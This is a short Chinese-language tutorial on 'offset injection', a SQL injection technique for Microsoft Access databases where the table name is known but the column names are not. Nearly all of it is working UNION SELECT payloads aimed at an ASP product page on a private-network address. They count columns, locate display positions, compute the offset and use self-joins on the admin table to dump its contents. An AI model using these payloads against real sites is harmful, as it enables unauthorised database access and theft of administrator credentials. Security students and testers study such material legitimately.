偏移注入主要是针对知道表,但是不知道字段的ACCESS数据库。
比如我们已经知道了表名是 admin
- 判断字段数:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 order by 22 返回正常
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 order by 23 返回错误
字段数为 22
- 爆出显示位:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
- 判断表内存在的字段数:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,* from admin 返回同上图一样得显示位页面
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,* from admin 返回错误
说明了admin表下有16个字段。
- 偏移公式如下:
order by 出的字段数减去 * 号判断出的字段数,然而再用order by的字段数减去2倍刚才得出来的答案
1. 22-16 = 6
2. 22-(6*2) = 10
所以答案就是 10
- 注入公式如下:(爆破内容是随机的)
一级偏移注入公式:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b on a.id = b.id)
此时可以增加a.id或者b.id或者a.id和b.id一起加上去来改变随机爆破出来的内容比如:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id = b.id)
二级偏移注入公式:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
此时可以增加a.id或者b.id或者a.id和b.id一起加上去来改变随机爆破出来的内容比如:
http://192.168.74.136:8002/Production/PRODUCT_DETAIL.asp?id=1406 union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
注意:这里是10个字段再减去了表里的6个字段,所以二级偏移这里是select 1,2,3,4
注意:查看源代码有奇效,可能会出现惊喜